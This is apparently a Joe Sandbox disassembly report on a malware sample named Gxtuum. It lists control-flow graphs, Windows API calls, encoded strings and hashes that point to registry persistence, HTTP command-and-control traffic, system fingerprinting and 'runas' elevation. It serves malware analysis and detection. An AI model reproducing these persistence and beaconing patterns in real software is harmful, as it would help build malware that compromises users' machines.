                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 000E64E3
                                                                  • Part of subcall function 000E61F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 000E6511
                                                                  • Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(80000001), ref: 000E651A
                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 000E663C
                                                                  • Part of subcall function 000E61F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 000E665F
                                                                  • Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(80000002), ref: 000E6668
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: CloseNameOpen$Value$User$AccountAuthorityFileIdentifierLookupModuleQuery
                                                                • String ID: 0f3be6$1PI0$1PY0$1ek0$246122658369$2y00$QK4rKq==$System$V$dOQ0$eUc0$eVM0$ezY0$fUQ0$fb0=$fyM0$gO40$gfM0
                                                                • API String ID: 4106312383-4174728819
                                                                • Opcode ID: c6bee32f76215f547a538e1b70de2b630ad70d8f7e4cb0f2efa946d6bf24e5f3
                                                                • Instruction ID: 799871798471a6e2c06b6f4dfd913f7dd86c60270f0b65e842824152d7875cbe
                                                                • Opcode Fuzzy Hash: c6bee32f76215f547a538e1b70de2b630ad70d8f7e4cb0f2efa946d6bf24e5f3
                                                                • Instruction Fuzzy Hash: 62D236709001589BEB2ADB28CD997EDBB36AF85304F5481DCE088A72D6DBB54FC48F51

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2447 f05b0-f05fc 2448 f0a07-f0a32 call 104640 2447->2448 2449 f0602-f0606 2447->2449 2455 f0a34-f0a40 2448->2455 2456 f0a60-f0a78 2448->2456 2449->2448 2450 f060c-f0610 2449->2450 2450->2448 2452 f0616-f06b4 Sleep InternetOpenW InternetConnectA call 103730 call e61f0 2450->2452 2481 f06b8-f06d4 HttpOpenRequestA 2452->2481 2482 f06b6 2452->2482 2460 f0a56-f0a5d call 10a429 2455->2460 2461 f0a42-f0a50 2455->2461 2457 f09be-f09d6 2456->2457 2458 f0a7e-f0a8a 2456->2458 2465 f0aaf-f0acb call 109db0 2457->2465 2466 f09dc-f09e8 2457->2466 2463 f09b4-f09bb call 10a429 2458->2463 2464 f0a90-f0a9e 2458->2464 2460->2456 2461->2460 2468 f0adb-f0ae0 call 10f419 2461->2468 2463->2457 2464->2468 2471 f0aa0 2464->2471 2472 f09ee-f09fc 2466->2472 2473 f0aa5-f0aac call 10a429 2466->2473 2471->2463 2472->2468 2479 f0a02 2472->2479 2473->2465 2479->2473 2485 f06d6-f06e5 2481->2485 2486 f0705-f0774 call 103730 call e61f0 call 103730 call e61f0 2481->2486 2482->2481 2488 f06fb-f0702 call 10a429 2485->2488 2489 f06e7-f06f5 2485->2489 2499 f0778-f078e HttpSendRequestA 2486->2499 2500 f0776 2486->2500 2488->2486 2489->2488 2501 f07bf-f07e7 2499->2501 2502 f0790-f079f 2499->2502 2500->2499 2503 f07e9-f07f8 2501->2503 2504 f0818-f083f InternetReadFile 2501->2504 2505 f07b5-f07b7 call 10a429 2502->2505 2506 f07a1-f07af 2502->2506 2508 f080e-f0815 call 10a429 2503->2508 2509 f07fa-f0808 2503->2509 2513 f0840-f08f0 call 10b4c0 InternetReadFile 2504->2513 2511 f07bc 2505->2511 2506->2505 2508->2504 2509->2508 2511->2501
                                                                APIs
                                                                • Sleep.KERNELBASE(000005DC,455139FB,?,00000000), ref: 000F0642
                                                                • InternetOpenW.WININET(0013DB90,00000000,00000000,00000000,00000000), ref: 000F0651
                                                                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 000F0675
                                                                • HttpOpenRequestA.WININET(?,00000000), ref: 000F06BF
                                                                • HttpSendRequestA.WININET(?,00000000), ref: 000F077F
                                                                • InternetReadFile.WININET(?,?,000003FF,?), ref: 000F0831
                                                                • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 000F08E0
                                                                • InternetCloseHandle.WININET(?), ref: 000F0907
                                                                • InternetCloseHandle.WININET(?), ref: 000F090F
                                                                • InternetCloseHandle.WININET(?), ref: 000F0917
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
                                                                • String ID: Xw9NTq==$dzRUatfzLr==$dzRUaxD Lt6=$invalid stoi argument$stoi argument out of range
                                                                • API String ID: 1439999335-2705372248
                                                                • Opcode ID: aa4bdd841eb6a412585ecb6626946cf1c70f4138dc69fe8963fb331f64c4e51a
                                                                • Instruction ID: 804b89c8a8863519ab22080c7233b34980b8ce6b0a325ad9650eafee4e1c9443
                                                                • Opcode Fuzzy Hash: aa4bdd841eb6a412585ecb6626946cf1c70f4138dc69fe8963fb331f64c4e51a
                                                                • Instruction Fuzzy Hash: 53B1D7B1A002589FDB24DF28CC88BAE7BB5EF41304F504198F649976D2DB759AC0CF95

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2522 e93d0-e9452 call 10ba40 GetVersionExW 2525 e9458-e9480 call 103730 call e61f0 2522->2525 2526 e99f6-e9a13 call 109db0 2522->2526 2533 e9484-e94a6 call 103730 call e61f0 2525->2533 2534 e9482 2525->2534 2539 e94aa-e94c3 GetModuleHandleA GetProcAddress 2533->2539 2540 e94a8 2533->2540 2534->2533 2541 e94f4-e951f 2539->2541 2542 e94c5-e94d4 2539->2542 2540->2539 2545 e9550-e9571 2541->2545 2546 e9521-e9530 2541->2546 2543 e94ea-e94f1 call 10a429 2542->2543 2544 e94d6-e94e4 2542->2544 2543->2541 2544->2543 2549 e9a14 call 10f419 2544->2549 2547 e9577 GetSystemInfo 2545->2547 2548 e9573-e9575 GetNativeSystemInfo 2545->2548 2551 e9546-e954d call 10a429 2546->2551 2552 e9532-e9540 2546->2552 2553 e957d-e9586 2547->2553 2548->2553 2560 e9a19-e9a1f call 10f419 2549->2560 2551->2545 2552->2549 2552->2551 2558 e9588-e958f 2553->2558 2559 e95a4-e95a7 2553->2559 2561 e9595-e959f 2558->2561 2562 e99f1 2558->2562 2563 e95ad-e95b6 2559->2563 2564 e9997-e999a 2559->2564 2566 e99ec 2561->2566 2562->2526 2567 e95b8-e95c4 2563->2567 2568 e95c9-e95cc 2563->2568 2564->2562 2569 e999c-e99a5 2564->2569 2566->2562 2567->2566 2571 e9974-e9976 2568->2571 2572 e95d2-e95d9 2568->2572 2573 e99cc-e99cf 2569->2573 2574 e99a7-e99ab 2569->2574 2577 e9978-e9982 2571->2577 2578 e9984-e9987 2571->2578 2579 e95df-e963b call 103730 call e61f0 call 103730 call e61f0 call e6320 2572->2579 2580 e96b9-e995d call 103730 call e61f0 call 103730 call e61f0 call e6320 call 103730 call e61f0 call e91b0 call 103730 call e61f0 call 103730 call e61f0 call e6320 call 103730 call e61f0 call e91b0 call 103730 call e61f0 call 103730 call e61f0 call e6320 call 103730 call e61f0 call e91b0 call 103730 call e61f0 call 103730 call e61f0 call e6320 call 103730 call e61f0 call e91b0 2572->2580 2575 e99dd-e99e9 2573->2575 2576 e99d1-e99db 2573->2576 2581 e99ad-e99b2 2574->2581 2582 e99c0-e99ca 2574->2582 2575->2566 2576->2562 2577->2566 2578->2562 2584 e9989-e9995 2578->2584 2603 e9640-e9647 2579->2603 2617 e9963-e996c 2580->2617 2581->2582 2586 e99b4-e99be 2581->2586 2582->2562 2584->2566 2586->2562 2605 e964b-e966b call 11227f 2603->2605 2606 e9649 2603->2606 2613 e966d-e967c 2605->2613 2614 e96a2-e96a4 2605->2614 2606->2605 2618 e967e-e968c 2613->2618 2619 e9692-e969f call 10a429 2613->2619 2616 e96aa-e96b4 2614->2616 2614->2617 2616->2617 2617->2564 2621 e996e 2617->2621 2618->2560 2618->2619 2619->2614 2621->2571
                                                                APIs
                                                                • GetVersionExW.KERNEL32(0000011C,455139FB,74DF0F00), ref: 000E944A
                                                                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E94AB
                                                                • GetProcAddress.KERNEL32(00000000), ref: 000E94B2
                                                                • GetNativeSystemInfo.KERNELBASE(?), ref: 000E9573
                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E9577
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: InfoSystem$AddressHandleModuleNativeProcVersion
                                                                • String ID: PbArL7==$PbArMG==$PbAsK7==$PbAsLG==
                                                                • API String ID: 374719553-3352537439
                                                                • Opcode ID: d6a743102f6c8192f7641e7ef93aef64451b812b8b0f9a94cd623e403b66da41
                                                                • Instruction ID: 3326acc173823a7f0debd4e3ae66a417b560596d5f3cee7faab22d5415e157eb
                                                                • Opcode Fuzzy Hash: d6a743102f6c8192f7641e7ef93aef64451b812b8b0f9a94cd623e403b66da41
                                                                • Instruction Fuzzy Hash: B70206B1E00284AFDF24AB29DC573AD7B71AB46314F54429CE841A73D3DB754E848BC2

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2672 123e8f-123ebf call 123bdd 2675 123ec1-123ecc call 11163f 2672->2675 2676 123eda-123ee6 call 11a755 2672->2676 2681 123ece-123ed5 call 111652 2675->2681 2682 123ee8-123efd call 11163f call 111652 2676->2682 2683 123eff-123f48 call 123b48 2676->2683 2690 1241b4-1241b8 2681->2690 2682->2681 2692 123fb5-123fbe GetFileType 2683->2692 2693 123f4a-123f53 2683->2693 2696 123fc0-123ff1 GetLastError call 11161c CloseHandle 2692->2696 2697 124007-12400a 2692->2697 2694 123f55-123f59 2693->2694 2695 123f8a-123fb0 GetLastError call 11161c 2693->2695 2694->2695 2699 123f5b-123f88 call 123b48 2694->2699 2695->2681 2696->2681 2711 123ff7-124002 call 111652 2696->2711 2702 124013-124019 2697->2702 2703 12400c-124011 2697->2703 2699->2692 2699->2695 2704 12401d-12406b call 11a6a0 2702->2704 2705 12401b 2702->2705 2703->2704 2714 12408a-1240b2 call 1238f5 2704->2714 2715 12406d-124079 call 123d57 2704->2715 2705->2704 2711->2681 2722 1240b7-1240f8 2714->2722 2723 1240b4-1240b5 2714->2723 2715->2714 2721 12407b 2715->2721 2724 12407d-124085 call 1186f9 2721->2724 2725 1240fa-1240fe 2722->2725 2726 124119-124127 2722->2726 2723->2724 2724->2690 2725->2726 2727 124100-124114 2725->2727 2728 1241b2 2726->2728 2729 12412d-124131 2726->2729 2727->2726 2728->2690 2729->2728 2731 124133-124166 CloseHandle call 123b48 2729->2731 2735 12419a-1241ae 2731->2735 2736 124168-124194 GetLastError call 11161c call 11a868 2731->2736 2735->2728 2736->2735
                                                                APIs
                                                                  • Part of subcall function 00123B48: CreateFileW.KERNELBASE(00000000,00000000,?,00123F38,?,?,00000000,?,00123F38,00000000,0000000C), ref: 00123B65
                                                                • GetLastError.KERNEL32 ref: 00123FA3
                                                                • __dosmaperr.LIBCMT ref: 00123FAA
                                                                • GetFileType.KERNELBASE(00000000), ref: 00123FB6
                                                                • GetLastError.KERNEL32 ref: 00123FC0
                                                                • __dosmaperr.LIBCMT ref: 00123FC9
                                                                • CloseHandle.KERNEL32(00000000), ref: 00123FE9
                                                                • CloseHandle.KERNEL32(001177E1), ref: 00124136
                                                                • GetLastError.KERNEL32 ref: 00124168
                                                                • __dosmaperr.LIBCMT ref: 0012416F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                • String ID: H
                                                                • API String ID: 4237864984-2852464175
                                                                • Opcode ID: 7bfacfbd5f306d134af0df6355f370a7aed2cfd0177be88c4acbb999a230ea4d
                                                                • Instruction ID: 0f51b71f29007d5abd0954c1de1e64083b4601f2b3da468afe763477bc35d004
                                                                • Opcode Fuzzy Hash: 7bfacfbd5f306d134af0df6355f370a7aed2cfd0177be88c4acbb999a230ea4d
                                                                • Instruction Fuzzy Hash: 3DA15632A001649FCF1D9F68EC517EE7BA1AF16320F180159F815EF2A1CB359DA6CB52

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2741 e89e0-e8a31 Sleep 2742 e8abe-e8b34 call 104640 * 3 CreateThread Sleep 2741->2742 2743 e8a37-e8a4b call 109ed2 2741->2743 2756 e8b36-e8b42 2742->2756 2757 e8b62-e8b7a 2742->2757 2743->2742 2748 e8a4d-e8abb call 10a414 call 109e88 2743->2748 2748->2742 2759 e8b58-e8b5f call 10a429 2756->2759 2760 e8b44-e8b52 2756->2760 2761 e8b7c-e8b88 2757->2761 2762 e8ba4-e8bbc 2757->2762 2759->2757 2760->2759 2763 e8bf8-e8c3e call 10f419 2760->2763 2765 e8b9a-e8ba1 call 10a429 2761->2765 2766 e8b8a-e8b98 2761->2766 2767 e8bbe-e8bca 2762->2767 2768 e8be6-e8bf7 2762->2768 2779 e8c44-e8c84 call 105d10 call 104ce0 2763->2779 2780 e8df1 call e26a0 2763->2780 2765->2762 2766->2763 2766->2765 2772 e8bdc-e8be3 call 10a429 2767->2772 2773 e8bcc-e8bda 2767->2773 2772->2768 2773->2763 2773->2772 2790 e8c86-e8c92 2779->2790 2791 e8cb2-e8d21 call 103730 * 2 call e61f0 call 104640 call e8700 2779->2791 2783 e8df6 call 10f419 2780->2783 2787 e8dfb-e8e00 call 10f419 2783->2787 2794 e8ca8-e8caf call 10a429 2790->2794 2795 e8c94-e8ca2 2790->2795 2806 e8d26-e8d34 2791->2806 2794->2791 2795->2783 2795->2794 2807 e8d36-e8d42 2806->2807 2808 e8d62-e8d68 2806->2808 2811 e8d58-e8d5f call 10a429 2807->2811 2812 e8d44-e8d52 2807->2812 2809 e8d6a-e8d76 2808->2809 2810 e8d92-e8daa 2808->2810 2814 e8d88-e8d8f call 10a429 2809->2814 2815 e8d78-e8d86 2809->2815 2816 e8dac-e8db8 2810->2816 2817 e8dd4-e8df0 call 109db0 2810->2817 2811->2808 2812->2787 2812->2811 2814->2810 2815->2787 2815->2814 2820 e8dca-e8dd1 call 10a429 2816->2820 2821 e8dba-e8dc8 2816->2821 2820->2817 2821->2787 2821->2820
                                                                APIs
                                                                • Sleep.KERNEL32(00000064,455139FB,?,00000000,001294DD,000000FF), ref: 000E8A1C
                                                                • __Init_thread_footer.LIBCMT ref: 000E8AB6
                                                                  • Part of subcall function 00109E88: EnterCriticalSection.KERNEL32(00148FA8,74DF0F00,?,000E8ABB,0014CDC0,00130580), ref: 00109E92
                                                                  • Part of subcall function 00109E88: LeaveCriticalSection.KERNEL32(00148FA8,?,000E8ABB,0014CDC0,00130580), ref: 00109EC5
                                                                  • Part of subcall function 00109E88: WakeAllConditionVariable.KERNEL32(?,0014CDC0,00130580), ref: 00109F3C
                                                                • CreateThread.KERNEL32(00000000,00000000,000E8880,0014C578,00000000,00000000), ref: 000E8B1B
                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000E8B26
                                                                  • Part of subcall function 00109ED2: EnterCriticalSection.KERNEL32(00148FA8,00000000,74DF0F00,?,000E8A41,0014CDC0), ref: 00109EDD
                                                                  • Part of subcall function 00109ED2: LeaveCriticalSection.KERNEL32(00148FA8,?,000E8A41,0014CDC0), ref: 00109F1A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeaveSleep$ConditionCreateInit_thread_footerThreadVariableWake
                                                                • String ID: runas
                                                                • API String ID: 4065365256-4000483414
                                                                • Opcode ID: 8d4d660a4a93dc0b0f02e5d955f68f1920475301d052463e8b7e5f1ba027bbdd
                                                                • Instruction ID: b1eac1b6672620e5cca3df83b5c86afaa4535115a683e1f2e1e90e5fdc66330b
                                                                • Opcode Fuzzy Hash: 8d4d660a4a93dc0b0f02e5d955f68f1920475301d052463e8b7e5f1ba027bbdd
                                                                • Instruction Fuzzy Hash: A0B14B71600248AFEB08DF28DD89B9D7B65EF45304F50821CF855AB7D1DBB5E9C08B91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2913 e9a20-e9aa1 call 10ba40 GetVersionExW 2916 e9aad-e9ad5 call 103730 call e61f0 2913->2916 2917 e9aa3-e9aa8 2913->2917 2925 e9ad9-e9afb call 103730 call e61f0 2916->2925 2926 e9ad7 2916->2926 2918 e9bef-e9c0b call 109db0 2917->2918 2931 e9aff-e9b18 GetModuleHandleA GetProcAddress 2925->2931 2932 e9afd 2925->2932 2926->2925 2933 e9b1a-e9b29 2931->2933 2934 e9b49-e9b74 2931->2934 2932->2931 2935 e9b3f-e9b46 call 10a429 2933->2935 2936 e9b2b-e9b39 2933->2936 2937 e9b76-e9b85 2934->2937 2938 e9ba1-e9bc2 2934->2938 2935->2934 2936->2935 2941 e9c0c-e9c11 call 10f419 2936->2941 2943 e9b97-e9b9e call 10a429 2937->2943 2944 e9b87-e9b95 2937->2944 2939 e9bc8 GetSystemInfo 2938->2939 2940 e9bc4-e9bc6 GetNativeSystemInfo 2938->2940 2946 e9bce-e9bd5 2939->2946 2940->2946 2943->2938 2944->2941 2944->2943 2946->2918 2951 e9bd7-e9bdf 2946->2951 2952 e9be8-e9beb 2951->2952 2953 e9be1-e9be6 2951->2953 2952->2918 2954 e9bed 2952->2954 2953->2918 2954->2918
                                                                APIs
                                                                • GetVersionExW.KERNEL32(0000011C,?,455139FB,00000000), ref: 000E9A99
                                                                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E9B00
                                                                • GetProcAddress.KERNEL32(00000000), ref: 000E9B07
                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E9BC4
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                                • String ID:
                                                                • API String ID: 2167034304-0
                                                                • Opcode ID: 01920ab6ca320ed102254d490e8cd7bac5f1763064ae1953961b925175e67247
                                                                • Instruction ID: b8a5d84292d5f67c145da9afd0099f7395e6fd822e60d0df30a262ccbf444220
                                                                • Opcode Fuzzy Hash: 01920ab6ca320ed102254d490e8cd7bac5f1763064ae1953961b925175e67247
                                                                • Instruction Fuzzy Hash: DA5127709142889FDB24EB29DE497DDBB75EF45310F5042A8E805A72D1EB704AC0CB91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2955 110bfc-110c31 GetFileType 2956 110c37-110c42 2955->2956 2957 110ce9-110cec 2955->2957 2958 110c64-110c80 call 10ba40 GetFileInformationByHandle 2956->2958 2959 110c44-110c55 call 110f72 2956->2959 2960 110d15-110d3d 2957->2960 2961 110cee-110cf1 2957->2961 2972 110d06-110d13 GetLastError call 11161c 2958->2972 2976 110c86-110cc8 call 110ec4 call 110d6c * 3 2958->2976 2974 110d02-110d04 2959->2974 2975 110c5b-110c62 2959->2975 2965 110d5a-110d5c 2960->2965 2966 110d3f-110d52 PeekNamedPipe 2960->2966 2961->2960 2964 110cf3-110cf5 2961->2964 2971 110cf7-110cfc call 111652 2964->2971 2964->2972 2968 110d5d-110d6b call 109db0 2965->2968 2966->2965 2967 110d54-110d57 2966->2967 2967->2965 2971->2974 2972->2974 2974->2968 2975->2958 2989 110ccd-110ce5 call 110e91 2976->2989 2989->2965 2992 110ce7 2989->2992 2992->2974
                                                                APIs
                                                                • GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00110B2E), ref: 00110C1E
                                                                • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00110C78
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00110B2E,?,000000FF,00000000,00000000), ref: 00110D06
                                                                • __dosmaperr.LIBCMT ref: 00110D0D
                                                                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00110D4A
                                                                  • Part of subcall function 00110F72: __dosmaperr.LIBCMT ref: 00110FA7
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                • String ID:
                                                                • API String ID: 1206951868-0
                                                                • Opcode ID: d008fde627b3c0de913dfc397804606769df85077dfdc18d9e7578d75bb344f0
                                                                • Instruction ID: 3716f6dd041ed6623868c3c0883e798dcf79b5caefb4e3dead37e92231efa9da
                                                                • Opcode Fuzzy Hash: d008fde627b3c0de913dfc397804606769df85077dfdc18d9e7578d75bb344f0
                                                                • Instruction Fuzzy Hash: 30412C75900208ABCF29DFE5EC459EBBBF9EF89300B144529F956D3611EB71A980CB21

                                                                Control-flow Graph

                                                                APIs
                                                                • Sleep.KERNELBASE(00002710,455139FB,00000000,?), ref: 000F9679
                                                                  • Part of subcall function 000EA470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,455139FB,00000000,?), ref: 000EA4BA
                                                                • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000,00147494,0000000E), ref: 000F96F5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: AttributesFileFolderPathSleep
                                                                • String ID: 0s==$2yxm
                                                                • API String ID: 70540035-2047973060
                                                                • Opcode ID: 0ae4f09eb7e8111407a6397a61acafaf0afb2b3af22e8ea165f661e52f60c14e
                                                                • Instruction ID: b5bb013c8b84eeedd576bc413404d47c2411066b488e99daba1e8d268d8278b4
                                                                • Opcode Fuzzy Hash: 0ae4f09eb7e8111407a6397a61acafaf0afb2b3af22e8ea165f661e52f60c14e
                                                                • Instruction Fuzzy Hash: AEC1CF70D0428CDFEF14DBA8C948BEEBFB6AF51304F248198D444272D2D7B55A84DBA1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 3775 e91b0-e921a 3776 e92f3 3775->3776 3777 e9220-e9227 3775->3777 3778 e92f5-e92fb 3776->3778 3779 e9230-e9247 3777->3779 3780 e932c-e9332 3778->3780 3781 e92fd-e9309 3778->3781 3782 e93bd call 104b50 3779->3782 3783 e924d-e926e call 104640 3779->3783 3785 e935b-e9373 3780->3785 3786 e9334-e933f 3780->3786 3787 e931f-e9329 call 10a429 3781->3787 3788 e930b-e9319 3781->3788 3792 e93c2-e9452 call 10f419 call 10ba40 GetVersionExW 3782->3792 3798 e929e-e92e2 call 105fc0 3783->3798 3799 e9270-e927e 3783->3799 3795 e939d-e93bc call 109db0 3785->3795 3796 e9375-e9381 3785->3796 3793 e9351-e9358 call 10a429 3786->3793 3794 e9341-e934f 3786->3794 3787->3780 3788->3787 3788->3792 3821 e9458-e9480 call 103730 call e61f0 3792->3821 3822 e99f6-e9a13 call 109db0 3792->3822 3793->3785 3794->3792 3794->3793 3802 e9393-e939a call 10a429 3796->3802 3803 e9383-e9391 3796->3803 3798->3778 3818 e92e4-e92e9 3798->3818 3806 e9294-e929b call 10a429 3799->3806 3807 e9280-e928e 3799->3807 3802->3795 3803->3792 3803->3802 3806->3798 3807->3792 3807->3806 3818->3776 3820 e92eb-e92ee 3818->3820 3820->3779 3829 e9484-e94a6 call 103730 call e61f0 3821->3829 3830 e9482 3821->3830 3835 e94aa-e94c3 GetModuleHandleA GetProcAddress 3829->3835 3836 e94a8 3829->3836 3830->3829 3837 e94f4-e951f 3835->3837 3838 e94c5-e94d4 3835->3838 3836->3835 3841 e9550-e9571 3837->3841 3842 e9521-e9530 3837->3842 3839 e94ea-e94f1 call 10a429 3838->3839 3840 e94d6-e94e4 3838->3840 3839->3837 3840->3839 3845 e9a14 call 10f419 3840->3845 3843 e9577 GetSystemInfo 3841->3843 3844 e9573-e9575 GetNativeSystemInfo 3841->3844 3847 e9546-e954d call 10a429 3842->3847 3848 e9532-e9540 3842->3848 3849 e957d-e9586 3843->3849 3844->3849 3856 e9a19-e9a1f call 10f419 3845->3856 3847->3841 3848->3845 3848->3847 3854 e9588-e958f 3849->3854 3855 e95a4-e95a7 3849->3855 3857 e9595-e959f 3854->3857 3858 e99f1 3854->3858 3859 e95ad-e95b6 3855->3859 